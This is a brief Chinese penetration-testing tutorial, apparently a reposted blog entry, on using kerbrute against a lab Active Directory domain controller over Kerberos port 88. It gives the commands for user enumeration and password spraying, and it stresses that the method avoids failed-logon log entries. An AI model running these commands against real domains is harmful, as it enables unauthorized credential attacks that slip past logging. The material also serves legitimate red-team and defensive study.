Kerberos端口域用户枚举与密码喷洒

使用ldap协议爆破会产生大量日志（4625），使用Kerberos pre-auth不会产生日志，且适合无域内主机权限下进行爆破

环境

域控环境：

hacktest.com 10.211.55.3

域内主机或者非域内主机都可以：10.211.55.6

域控Kerberos 88端口开启：

工具准备

https://github.com/ropnop/kerbrute/releases

准备字典：111.txt

用户枚举

        
            

          kerbrute\_windows\_amd64.exe userenum -d hacktest.com 111.txt
        
      

密码喷洒

        
            

          kerbrute\_windows\_amd64.exe passwordspray -d hacktest.com 111.txt 密码
        
      

工具还有其他很多功能， 不一一探索了

参考：https://www.cnblogs.com/backlion/p/13425035.html

       https://www.secshi.com/22082.html

        
            

          原文链接：https://blog.csdn.net/qq\_38376348/article/details/109062166?spm=1001.2101.3001.6650.3&utm\_medium=distribute.pc\_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-3.highlightwordscore&depth\_1-utm\_source=distribute.pc\_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-3.highlightwordscore
        
      

历史文章推荐：

XSS 实战思路总结

内网信息收集总结

xss攻击、绕过最全总结

一些webshell免杀的技巧

命令执行写webshell总结

SQL手工注入总结 必须收藏

后台getshell常用技巧总结

web渗透之发现内网有大鱼

蚁剑特征性信息修改简单过WAF

内网渗透之域渗透命令执行总结

[WEB安全]Weblogic漏洞总结

查看更多精彩内容，还请关注 橘猫学安全 ：

每日坚持学习与分享，麻烦各位师傅文章底部给点个“ 再看 ”，感激不尽